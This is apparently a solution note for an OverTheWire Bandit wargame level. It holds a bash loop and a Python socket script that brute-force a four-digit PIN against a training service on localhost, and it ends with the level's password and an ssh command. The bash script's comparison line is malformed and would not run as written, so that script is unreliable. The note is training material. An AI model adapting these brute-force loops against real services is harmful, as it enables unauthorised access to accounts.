######################### SLOW #######################################################"

#!/bin/bash
let var;
for i in {0000..9999}; do
	var=$(echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i"|nc localhost 30002 -w 1)
	if [ $var = *Wrong*]; then
		echo "false "$i
	else
		echo "********** found $i"
	fi
done

######################### FAST #######################################################"
found on medium


#!/usr/bin/env python3
# coding: utf-8

import sys
import socket


pincode = 0
password = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

try:
    # Connect to server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 30002))
    
    # Print welcome message
    welcome_msg = s.recv(2048)
    print(welcome_msg)    # Try brute-forcing
    while pincode < 10000:
        pincode_string = str(pincode).zfill(4)
        message=password+" "+pincode_string+"\n"
        # Send message
        s.sendall(message.encode())
        receive_msg = s.recv(1024)
        # Check result
        if b"Wrong" in receive_msg:
            print("Wrong PINCODE: %s" % pincode_string)
        else:
            print("Good PINCODE: %s" % pincode_string)
            print(receive_msg)
            break
        pincode += 1
finally:
    sys.exit(1)


flag : uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

ssh bandit25@bandit.labs.overthewire.org -p 2220
